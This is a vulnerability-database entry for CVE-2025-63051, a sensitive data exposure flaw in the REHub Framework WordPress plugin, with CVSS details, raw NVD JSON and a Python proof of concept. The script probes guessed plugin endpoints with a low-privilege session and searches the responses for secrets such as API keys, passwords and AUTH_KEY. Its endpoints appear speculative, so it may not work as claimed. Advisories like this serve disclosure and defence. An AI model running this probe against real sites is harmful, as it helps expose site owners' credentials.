Security Vulnerability Report
中文
CVE-2025-63051 CVSS 4.3 MEDIUM

CVE-2025-63051

Published: 2026-01-22 17:16:00
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in sizam REHub Framework rehub-framework allows Retrieve Embedded Sensitive Data.This issue affects REHub Framework: from n/a through < 19.9.9.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

REHub Framework < 19.9.9.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63051 PoC - REHub Framework Sensitive Data Exposure # This PoC demonstrates the sensitive information disclosure vulnerability # in REHub Framework plugin for WordPress import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-63051 """ # Target endpoint that may expose sensitive data vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/rehub/v1/config', '/wp-content/plugins/rehub-framework/includes/ajax-handler.php' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } # Test with low-privilege user session # Replace with actual cookies from authenticated low-privilege user cookies = { 'wordpress_test_cookie': 'WP Cookie check', # Add authenticated session cookie here } print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerability: CVE-2025-63051 - Sensitive Data Exposure") for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, cookies=cookies, timeout=10) # Check for sensitive data patterns sensitive_patterns = [ 'api_key', 'secret', 'password', 'credential', 'DB_', 'AUTH_KEY' ] if response.status_code == 200: content = response.text.lower() for pattern in sensitive_patterns: if pattern.lower() in content: print(f"[!] Potential sensitive data found at: {url}") print(f"[!] Pattern matched: {pattern}") return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}") print("[*] No obvious vulnerability indicators found") print("[*] Manual verification recommended") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2025_63051_poc.py <target_url>") print("Example: python cve_2025_63051_poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63051", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:59.907", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in sizam REHub Framework rehub-framework allows Retrieve Embedded Sensitive Data.This issue affects REHub Framework: from n/a through < 19.9.9.4."}, {"lang": "es", "value": "Vulnerabilidad de exposición de información sensible del sistema a una esfera de control no autorizada en sizam REHub Framework rehub-framework permite recuperar datos sensibles incrustados. Este problema afecta a REHub Framework: desde n/a hasta &lt; 19.9.9.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/rehub-framework/vulnerability/wordpress-rehub-framework-plugin-19-9-9-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}